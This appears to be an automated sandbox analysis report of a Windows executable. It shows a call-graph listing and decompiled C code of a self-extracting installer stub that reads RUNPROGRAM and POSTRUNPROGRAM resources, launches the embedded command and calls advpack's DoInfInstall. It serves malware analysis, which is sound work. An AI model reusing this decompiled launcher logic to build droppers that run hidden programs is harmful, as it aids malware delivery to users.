2938->2951 2944 bc1ea1 2939->2944 2940->2935 2941->2927 2946 bc1de1 2941->2946 2944->2682 2945->2952 2950 bc171e _vsnprintf 2946->2950 2948 bc1d09 GetShortPathNameA 2947->2948 2949 bc1d23 2947->2949 2948->2949 2953 bc171e _vsnprintf 2949->2953 2950->2951 2951->2936 3024 bc2aac 2952->3024 2953->2951 2955 bc209a 2954->2955 2956 bc2256 2954->2956 2958 bc171e _vsnprintf 2955->2958 2961 bc20dc 2955->2961 2957 bc6ce0 4 API calls 2956->2957 2959 bc2263 2957->2959 2960 bc20af RegQueryValueExA 2958->2960 2959->2682 2960->2955 2960->2961 2962 bc20fb GetSystemDirectoryA 2961->2962 2963 bc20e4 RegCloseKey 2961->2963 2964 bc658a CharPrevA 2962->2964 2963->2956 2965 bc211b LoadLibraryA 2964->2965 2966 bc212e GetProcAddress FreeLibrary 2965->2966 2967 bc2179 GetModuleFileNameA 2965->2967 2966->2967 2968 bc214e GetSystemDirectoryA 2966->2968 2969 bc21de RegCloseKey 2967->2969 2972 bc2177 2967->2972 2970 bc2165 2968->2970 2968->2972 2969->2956 2971 bc658a CharPrevA 2970->2971 2971->2972 2972->2972 2973 bc21b7 LocalAlloc 2972->2973 2974 bc21cd 2973->2974 2975 bc21ec 2973->2975 2976 bc44b9 20 API calls 2974->2976 2977 bc171e _vsnprintf 2975->2977 2976->2969 2978 bc2218 RegSetValueExA RegCloseKey LocalFree 2977->2978 2978->2956 2981 bc4106 2980->2981 2982 bc4016 CreateProcessA 2980->2982 2985 bc6ce0 4 API calls 2981->2985 2983 bc40c4 2982->2983 2984 bc4041 WaitForSingleObject GetExitCodeProcess 2982->2984 2986 bc6285 GetLastError 2983->2986 2987 bc4070 2984->2987 2988 bc4117 2985->2988 2990 bc40c9 GetLastError FormatMessageA 2986->2990 3051 bc411b 2987->3051 2988->2682 2992 bc44b9 20 API calls 2990->2992 2991 bc4096 CloseHandle CloseHandle 2991->2981 2993 bc40ba 2991->2993 2992->2981 2993->2981 2995 bc64c2 2994->2995 2996 bc658a CharPrevA 2995->2996 2997 bc64d8 GetFileAttributesA 2996->2997 2998 bc64ea 2997->2998 2999 bc6501 LoadLibraryA 2997->2999 2998->2999 3000 bc64ee LoadLibraryExA 2998->3000 3001 bc6508 2999->3001 3000->3001 3002 bc6ce0 4 API calls 3001->3002 3003 bc6513 3002->3003 3003->2702 3005 bc2289 RegOpenKeyExA 3004->3005 3006 bc2381 3004->3006 3005->3006 3007 bc22b1 RegQueryValueExA 3005->3007 3008 bc6ce0 4 API calls 3006->3008 3009 bc2374 RegCloseKey 3007->3009 3010 bc22e6 memset GetSystemDirectoryA 3007->3010 3011 bc238c 3008->3011 3009->3006 3012 bc230f 3010->3012 3013 bc2321 3010->3013 3011->2675 3014 bc658a CharPrevA 3012->3014 3015 bc171e _vsnprintf 3013->3015 3014->3013 3016 bc233f RegSetValueExA 3015->3016 3016->3009 3019 bc1a9a 3018->3019 3021 bc1aba 3019->3021 3023 bc1aaf 3019->3023 3037 bc667f 3019->3037 3021->2917 3022 bc667f 2 API calls 3022->3023 3023->3021 3023->3022 3025 bc2be6 3024->3025 3026 bc2ad4 GetModuleFileNameA 3024->3026 3027 bc6ce0 4 API calls 3025->3027 3035 bc2b02 3026->3035 3029 bc2bf5 3027->3029 3028 bc2af1 IsDBCSLeadByte 3028->3035 3029->2936 3030 bc2bca CharNextA 3032 bc2bd3 CharNextA 3030->3032 3031 bc2b11 CharNextA CharUpperA 3033 bc2b8d CharUpperA 3031->3033 3031->3035 3032->3035 3033->3035 3035->3025 3035->3028 3035->3030 3035->3031 3035->3032 3035->3035 3036 bc2b43 CharPrevA 3035->3036 3042 bc65e8 3035->3042 3036->3035 3038 bc6689 3037->3038 3039 bc66a5 3038->3039 3040 bc6648 IsDBCSLeadByte 3038->3040 3041 bc6697 CharNextA 3038->3041 3039->3019 3040->3038 3041->3038 3043 bc65f4 3042->3043 3043->3043 3044 bc65fb CharPrevA 3043->3044 3045 bc6611 CharPrevA 3044->3045 3046 bc661e 3045->3046 3047 bc660b 3045->3047 3048 bc663d 3046->3048 3049 bc6634 CharNextA 3046->3049 3050 bc6627 CharPrevA 3046->3050 3047->3045 3047->3046 3048->3035 3049->3048 3050->3048 3050->3049 3052 bc4132 3051->3052 3054 bc412a 3051->3054 3055 bc1ea7 3052->3055 3054->2991 3056 bc1eba 3055->3056 3058 bc1ed3 3055->3058 3057 bc256d 15 API calls 3056->3057 3057->3058 3058->3054 3060 bc2026 3059->3060 3061 bc1ff0 RegOpenKeyExA 3059->3061 3060->2321 3061->3060 3062 bc200f RegDeleteValueA RegCloseKey 3061->3062 3062->3060 3173 bc19e0 3174 bc1a24 GetDesktopWindow 3173->3174 3175 bc1a03 3173->3175 3177 bc43d0 11 API calls 3174->3177 3176 bc1a20 3175->3176 3178 bc1a16 EndDialog 3175->3178 3180 bc6ce0 4 API calls 3176->3180 3179 bc1a33 LoadStringA SetDlgItemTextA MessageBeep 3177->3179 3178->3176 3179->3176 3181 bc1a7e 3180->3181 3182 bc6a20 __getmainargs 3063 bc4cd0 3064 bc4cf4 3063->3064 3065 bc4d0b 3063->3065 3066 bc4d02 3064->3066 3067 bc4b60 FindCloseChangeNotification 3064->3067 3065->3066 3069 bc4dcb 3065->3069 3072 bc4d25 3065->3072 3068 bc6ce0 4 API calls 3066->3068 3067->3066 3070 bc4e95 3068->3070 3071 bc4dd4 SetDlgItemTextA 3069->3071 3073 bc4de3 3069->3073 3071->3073 3072->3066 3086 bc4c37 3072->3086 3073->3066 3091 bc476d 3073->3091 3077 bc4e38 3077->3066 3079 bc4980 25 API calls 3077->3079 3078 bc4b60 FindCloseChangeNotification 3080 bc4d99 SetFileAttributesA 3078->3080 3081 bc4e56 3079->3081 3080->3066 3081->3066 3082 bc4e64 3081->3082 3100 bc47e0 LocalAlloc 3082->3100 3085 bc4e6f 3085->3066 3087 bc4c4c DosDateTimeToFileTime 3086->3087 3088 bc4c88 3086->3088 3087->3088 3089 bc4c5e LocalFileTimeToFileTime 3087->3089 3088->3066 3088->3078 3089->3088 3090 bc4c70 SetFileTime 3089->3090 3090->3088 3109 bc66ae GetFileAttributesA 3091->3109 3093 bc477b 3093->3077 3094 bc47cc SetFileAttributesA 3096 bc47db 3094->3096 3096->3077 3097 bc6517 24 API calls 3098 bc47b1 3097->3098 3098->3094 3098->3096 3099 bc47c2 3098->3099 3099->3094 3101 bc480f LocalAlloc 3100->3101 3102 bc47f6 3100->3102 3105 bc480b 3101->3105 3106 bc4831 3101->3106 3103 bc44b9 20 API calls 3102->3103 3103->3105 3105->3085 3107 bc44b9 20 API calls 3106->3107 3108 bc4846 LocalFree 3107->3108 3108->3105 3110 bc4777 3109->3110 3110->3093 3110->3094 3110->3097 3111 bc4ad0 3119 bc3680 3111->3119 3114 bc4aee WriteFile 3116 bc4b0f 3114->3116 3117 bc4b14 3114->3117 3115 bc4ae9 3117->3116 3118 bc4b3b SendDlgItemMessageA 3117->3118 3118->3116 3120 bc3691 MsgWaitForMultipleObjects 3119->3120 3121 bc36e8 3120->3121 3122 bc36a9 PeekMessageA 3120->3122 3121->3114 3121->3115 3122->3120 3123 bc36bc 3122->3123 3123->3120 3123->3121 3124 bc36c7 DispatchMessageA 3123->3124 3125 bc36d1 PeekMessageA 3123->3125 3124->3125 3125->3123 3183 bc3210 3184 bc3227 3183->3184 3208 bc328e EndDialog 3183->3208 3185 bc3235 3184->3185 3186 bc33e2 GetDesktopWindow 3184->3186 3190 bc324c 3185->3190 3191 bc32dd GetDlgItemTextA 3185->3191 3215 bc3239 3185->3215 3188 bc43d0 11 API calls 3186->3188 3189 bc33f1 SetWindowTextA SendDlgItemMessageA 3188->3189 3192 bc341f GetDlgItem EnableWindow 3189->3192 3189->3215 3194 bc32c5 EndDialog 3190->3194 3195 bc3251 3190->3195 3193 bc3366 3191->3193 3200 bc32fc 3191->3200 3192->3215 3197 bc44b9 20 API calls 3193->3197 3194->3215 3196 bc325c LoadStringA 3195->3196 3195->3215 3198 bc327b 3196->3198 3199 bc3294 3196->3199 3197->3215 3204 bc44b9 20 API calls 3198->3204 3221 bc4224 LoadLibraryA 3199->3221 3200->3193 3203 bc3331 GetFileAttributesA 3200->3203 3206 bc337c 3203->3206 3207 bc333f 3203->3207 3204->3208 3205 bc32a5 SetDlgItemTextA 3205->3198 3205->3215 3209 bc658a CharPrevA 3206->3209 3210 bc44b9 20 API calls 3207->3210 3208->3215 3211 bc338d 3209->3211 3212 bc3351 3210->3212 3213 bc58c8 27 API calls 3211->3213 3214 bc335a CreateDirectoryA 3212->3214 3212->3215 3216 bc3394 3213->3216 3214->3193 3214->3206 3216->3193 3217 bc33a4 3216->3217 3218 bc33c7 EndDialog 3217->3218 3219 bc597d 34 API calls 3217->3219 3218->3215 3220 bc33c3 3219->3220 3220->3215 3220->3218 3222 bc4246 GetProcAddress 3221->3222 3223 bc43b2 3221->3223 3224 bc425d GetProcAddress 3222->3224 3225 bc43a4 FreeLibrary 3222->3225 3227 bc44b9 20 API calls 3223->3227 3224->3225 3226 bc4274 GetProcAddress 3224->3226 3225->3223 3226->3225 3228 bc428b 3226->3228 3229 bc329d 3227->3229 3230 bc4295 GetTempPathA 3228->3230 3231 bc42e1 3228->3231 3229->3205 3229->3215 3232 bc42ad 3230->3232 3235 bc4390 FreeLibrary 3231->3235 3232->3232 3233 bc42b4 CharPrevA 3232->3233 3233->3231 3234 bc42d0 CharPrevA 3233->3234 3234->3231 3235->3229 3236 bc4a50 3237 bc4a9f ReadFile 3236->3237 3238 bc4a66 3236->3238 3239 bc4abb 3237->3239 3238->3239 3240 bc4a82 memcpy 3238->3240 3240->3239 3241 bc3450 3242 bc345e 3241->3242 3243 bc34d3 EndDialog 3241->3243 3244 bc349a GetDesktopWindow 3242->3244 3247 bc3465 3242->3247 3245 bc346a 3243->3245 3246 bc43d0 11 API calls 3244->3246 3248 bc34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3246->3248 3247->3245 3249 bc348c EndDialog 3247->3249 3248->3245 3249->3245 3126 bc4cc0 GlobalFree 3127 bc6f40 SetUnhandledExceptionFilter 3250 bc4bc0 3251 bc4bd7 3250->3251 3253 bc4c05 3250->3253 3252 bc4c1b SetFilePointer 3252->3251 3253->3251 3253->3252 3254 bc30c0 3255 bc30de CallWindowProcA 3254->3255 3256 bc30ce 3254->3256 3257 bc30da 3255->3257 3256->3255 3256->3257 3258 bc63c0 3259 bc6407 3258->3259 3260 bc658a CharPrevA 3259->3260 3261 bc6415 CreateFileA 3260->3261 3262 bc6448 WriteFile 3261->3262 3263 bc643a 3261->3263 3264 bc6465 CloseHandle 3262->3264 3266 bc6ce0 4 API calls 3263->3266 3264->3263 3267 bc648f 3266->3267 3268 bc3100 3269 bc31b0 3268->3269 3270 bc3111 3268->3270 3271 bc31b9 SendDlgItemMessageA 3269->3271 3272 bc3141 3269->3272 3273 bc3149 GetDesktopWindow 3270->3273 3276 bc311d 3270->3276 3271->3272 3275 bc43d0 11 API calls 3273->3275 3274 bc3138 EndDialog 3274->3272 3277 bc315d 6 API calls 3275->3277 3276->3272 3276->3274 3277->3272 3278 bc4200 3279 bc421e 3278->3279 3280 bc420b SendMessageA 3278->3280 3280->3279 3281 bc6c03 3282 bc6c1e 3281->3282 3283 bc6c17 _exit 3281->3283 3284 bc6c27 _cexit 3282->3284 3285 bc6c32 3282->3285 3283->3282 3284->3285

                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                        callgraph 0 Function_00BC6FBE 112 Function_00BC6F54 0->112 1 Function_00BC44B9 30 Function_00BC1680 1->30 54 Function_00BC6CE0 1->54 65 Function_00BC67C9 1->65 82 Function_00BC171E 1->82 83 Function_00BC681F 1->83 2 Function_00BC52B6 22 Function_00BC2390 2->22 34 Function_00BC1781 2->34 49 Function_00BC65E8 2->49 2->54 58 Function_00BC1FE1 2->58 3 Function_00BC69B0 3->0 45 Function_00BC71EF 3->45 93 Function_00BC7000 3->93 100 Function_00BC6C70 3->100 4 Function_00BC16B3 4->34 5 Function_00BC2AAC 5->30 5->49 5->54 64 Function_00BC17C8 5->64 6 Function_00BC66AE 7 Function_00BC2CAA 7->1 16 Function_00BC18A3 7->16 17 Function_00BC5C9E 7->17 7->22 24 Function_00BC468F 7->24 42 Function_00BC36EE 7->42 7->54 86 Function_00BC6517 7->86 8 Function_00BC6FA5 117 Function_00BC724D 8->117 9 Function_00BC1EA7 102 Function_00BC256D 9->102 10 Function_00BC55A0 10->1 10->24 26 Function_00BC658A 10->26 29 Function_00BC6285 10->29 10->34 10->54 73 Function_00BC2630 10->73 10->86 96 Function_00BC597D 10->96 106 Function_00BC5467 10->106 116 Function_00BC6952 10->116 11 Function_00BC4CA0 12 Function_00BC53A1 12->26 12->30 12->54 12->82 13 Function_00BC6FA1 14 Function_00BC3BA2 14->1 20 Function_00BC6495 14->20 14->24 14->29 14->34 44 Function_00BC3FEF 14->44 47 Function_00BC1AE8 14->47 14->54 74 Function_00BC202A 14->74 107 Function_00BC2267 14->107 15 Function_00BC72A2 43 Function_00BC17EE 16->43 16->54 17->1 17->26 17->30 53 Function_00BC31E0 17->53 17->54 63 Function_00BC66C8 17->63 75 Function_00BC6E2A 17->75 85 Function_00BC5C17 17->85 97 Function_00BC667F 17->97 18 Function_00BC6298 18->54 18->82 19 Function_00BC4E99 19->30 20->26 20->34 20->54 21 Function_00BC1F90 21->1 21->9 21->54 22->4 22->22 22->26 22->30 22->54 23 Function_00BC6793 25 Function_00BC2A89 26->4 27 Function_00BC268B 27->1 27->54 27->82 28 Function_00BC1A84 28->97 30->34 31 Function_00BC4980 31->1 98 Function_00BC487A 31->98 32 Function_00BC3680 33 Function_00BC6380 35 Function_00BC4EFD 35->31 35->54 108 Function_00BC4B60 35->108 36 Function_00BC70FE 37 Function_00BC66F9 38 Function_00BC2BFB 38->2 38->7 38->21 80 Function_00BC2F1D 38->80 39 Function_00BC6CF0 40 Function_00BC34F0 40->1 40->32 61 Function_00BC43D0 40->61 41 Function_00BC6EF0 42->1 42->25 48 Function_00BC28E8 42->48 42->54 42->65 42->83 43->54 44->1 44->29 44->54 84 Function_00BC411B 44->84 46 Function_00BC6BEF 47->1 47->4 47->5 47->26 47->28 47->30 47->34 47->54 47->63 47->82 48->25 101 Function_00BC2773 48->101 50 Function_00BC70EB 51 Function_00BC51E5 51->1 51->24 51->29 52 Function_00BC4FE0 52->1 52->24 52->35 54->39 55 Function_00BC24E0 55->26 55->54 56 Function_00BC19E0 56->54 56->61 57 Function_00BC47E0 57->1 57->30 59 Function_00BC4CD0 59->19 59->31 59->54 59->57 72 Function_00BC4C37 59->72 94 Function_00BC4702 59->94 103 Function_00BC476D 59->103 59->108 60 Function_00BC4AD0 60->32 61->54 62 Function_00BC58C8 62->1 62->26 62->29 62->30 118 Function_00BC6648 63->118 65->23 66 Function_00BC4CC0 67 Function_00BC4BC0 68 Function_00BC30C0 69 Function_00BC63C0 69->26 69->34 69->54 70 Function_00BC3A3F 70->1 70->24 70->29 70->86 71 Function_00BC6C3F 73->1 73->54 74->1 74->26 74->54 74->82 75->39 76 Function_00BC4224 76->1 76->30 77 Function_00BC3B26 77->18 77->52 77->86 78 Function_00BC7120 79 Function_00BC6A20 80->1 80->10 80->14 80->26 80->29 80->51 80->54 80->70 80->77 81 Function_00BC621E 80->81 80->102 104 Function_00BC4169 80->104 105 Function_00BC5164 80->105 81->1 81->29 81->54 81->96 83->37 83->54 84->9 86->1 87 Function_00BC7010 88 Function_00BC3210 88->1 88->26 88->61 88->62 88->76 88->96 89 Function_00BC490C 90 Function_00BC7208 91 Function_00BC3100 91->61 92 Function_00BC4200 94->4 94->30 95 Function_00BC6C03 95->117 96->1 96->27 96->29 96->54 97->118 98->89 99 Function_00BC7270 101->26 101->30 101->34 101->54 102->55 103->6 103->86 104->1 104->24 105->1 105->18 105->24 106->12 106->26 106->29 106->30 106->34 106->54 106->62 106->96 107->26 107->54 107->82 109 Function_00BC6A60 109->38 109->71 109->90 110 Function_00BC7060 109->110 113 Function_00BC7155 109->113 109->117 110->78 110->87 111 Function_00BC6760 112->90 112->117 114 Function_00BC4A50 115 Function_00BC3450 115->61 119 Function_00BC6F40

                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                        Function 00BC3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308libraryloaderCOMMONCrypto
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 36 bc3ba2-bc3bd9 37 bc3bfd-bc3bff 36->37 38 bc3bdb-bc3bee call bc468f 36->38 40 bc3c03-bc3c28 memset 37->40 44 bc3bf4-bc3bf7 38->44 45 bc3d13-bc3d30 call bc44b9 38->45 42 bc3c2e-bc3c40 call bc468f 40->42 43 bc3d35-bc3d48 call bc1781 40->43 42->45 54 bc3c46-bc3c49 42->54 49 bc3d4d-bc3d52 43->49 44->37 44->45 56 bc3f4d 45->56 52 bc3d9e-bc3db6 call bc1ae8 49->52 53 bc3d54-bc3d6c call bc468f 49->53 52->56 67 bc3dbc-bc3dc2 52->67 53->45 69 bc3d6e-bc3d75 53->69 54->45 58 bc3c4f-bc3c56 54->58 60 bc3f4f-bc3f63 call bc6ce0 56->60 62 bc3c58-bc3c5e 58->62 63 bc3c60-bc3c65 58->63 64 bc3c6e-bc3c73 62->64 65 bc3c75-bc3c7c 63->65 66 bc3c67-bc3c6d 63->66 70 bc3c87-bc3c89 64->70 65->70 73 bc3c7e-bc3c82 65->73 66->64 71 bc3dc4-bc3dce 67->71 72 bc3de6-bc3de8 67->72 75 bc3fda-bc3fe1 69->75 76 bc3d7b-bc3d98 CompareStringA 69->76 70->49 78 bc3c8f-bc3c98 70->78 71->72 77 bc3dd0-bc3dd7 71->77 79 bc3dee-bc3df5 72->79 80 bc3f0b-bc3f15 call bc3fef 72->80 73->70 81 bc3fe8-bc3fea 75->81 82 bc3fe3 call bc2267 75->82 76->52 76->75 77->72 84 bc3dd9-bc3ddb 77->84 85 bc3c9a-bc3c9c 78->85 86 bc3cf1-bc3cf3 78->86 87 bc3fab-bc3fd2 call bc44b9 LocalFree 79->87 88 bc3dfb-bc3dfd 79->88 91 bc3f1a-bc3f1c 80->91 81->60 82->81 84->79 92 bc3ddd-bc3de1 call bc202a 84->92 94 bc3c9e-bc3ca3 85->94 95 bc3ca5-bc3ca7 85->95 86->52 90 bc3cf9-bc3d11 call bc468f 86->90 87->56 88->80 96 bc3e03-bc3e0a 88->96 90->45 90->49 98 bc3f1e-bc3f2d LocalFree 91->98 99 bc3f46-bc3f47 LocalFree 91->99 92->72 102 bc3cb2-bc3cc5 call bc468f 94->102 95->56 103 bc3cad 95->103 96->80 104 bc3e10-bc3e19 call bc6495 96->104 106 bc3fd7-bc3fd9 98->106 107 bc3f33-bc3f3b 98->107 99->56 102->45 112 bc3cc7-bc3ce8 CompareStringA 102->112 103->102 113 bc3e1f-bc3e36 GetProcAddress 104->113 114 bc3f92-bc3fa9 call bc44b9 104->114 106->75 107->40 112->86 118 bc3cea-bc3ced 112->118 115 bc3e3c-bc3e80 113->115 116 bc3f64-bc3f76 call bc44b9 FreeLibrary 113->116 125 bc3f7c-bc3f90 LocalFree call bc6285 114->125 119 bc3e8b-bc3e94 115->119 120 bc3e82-bc3e87 115->120 116->125 118->86 123 bc3e9f-bc3ea2 119->123 124 bc3e96-bc3e9b 119->124 120->119 128 bc3ead-bc3eb6 123->128 129 bc3ea4-bc3ea9 123->129 124->123 125->56 131 bc3eb8-bc3ebd 128->131 132 bc3ec1-bc3ec3 128->132 129->128 131->132 133 bc3ece-bc3eec 132->133 134 bc3ec5-bc3eca 132->134 137 bc3eee-bc3ef3 133->137 138 bc3ef5-bc3efd 133->138 134->133 137->138 139 bc3eff-bc3f09 FreeLibrary 138->139 140 bc3f40 FreeLibrary 138->140 139->98 140->99
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00BC3BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0xbc9124 =  *0xbc9124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0xbc8a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0xbc8c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E00BC468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E00BC44B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0xbc9124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00BC1AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00BC6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00BC3FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0xbc8580;
													if( *0xbc8580 != 0) {
														E00BC2267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0xbc8180;
											if( *0xbc8180 == 0) {
												_t146 = 0x4c7;
												E00BC44B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0xbc9124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0xbc9a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00BC6495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E00BC44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0xbc9124 = E00BC6285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E00BC44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0xbc8a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0xbc9a40; // 0x3
											_v364 = _t96;
											_t97 =  *0xbc8a38 & 0x0000ffff;
											_v380 = 0xbc9154;
											_v376 = _t151;
											_v372 = 0xbc91e4;
											_v360 = _t97;
											if( *0xbc8a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0xbc9a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0xbc8d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0xbc9a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0xbca288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0xbc9124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0xbc9a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0xbc8a20;
										if( *0xbc8a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E00BC202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E00BC468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0xbc8c42;
									if( *0xbc8c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0xbc8a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E00BC468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E00BC468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00BC1781( &_v276, 0x104, _t130, 0xbc8c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E00BC468F(_t130, 0xbc9a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}





























































                                                                                                                                                                                                        0x00bc3baa
                                                                                                                                                                                                        0x00bc3bb0
                                                                                                                                                                                                        0x00bc3bb7
                                                                                                                                                                                                        0x00bc3bc0
                                                                                                                                                                                                        0x00bc3bc2
                                                                                                                                                                                                        0x00bc3bc9
                                                                                                                                                                                                        0x00bc3bcb
                                                                                                                                                                                                        0x00bc3bcf
                                                                                                                                                                                                        0x00bc3bd3
                                                                                                                                                                                                        0x00bc3bd9
                                                                                                                                                                                                        0x00bc3bfd
                                                                                                                                                                                                        0x00bc3bfd
                                                                                                                                                                                                        0x00bc3bff
                                                                                                                                                                                                        0x00bc3c03
                                                                                                                                                                                                        0x00bc3c03
                                                                                                                                                                                                        0x00bc3c11
                                                                                                                                                                                                        0x00bc3c16
                                                                                                                                                                                                        0x00bc3c19
                                                                                                                                                                                                        0x00bc3c28
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3c30
                                                                                                                                                                                                        0x00bc3c39
                                                                                                                                                                                                        0x00bc3c40
                                                                                                                                                                                                        0x00bc3d13
                                                                                                                                                                                                        0x00bc3d15
                                                                                                                                                                                                        0x00bc3d21
                                                                                                                                                                                                        0x00bc3d26
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3c4f
                                                                                                                                                                                                        0x00bc3c56
                                                                                                                                                                                                        0x00bc3c60
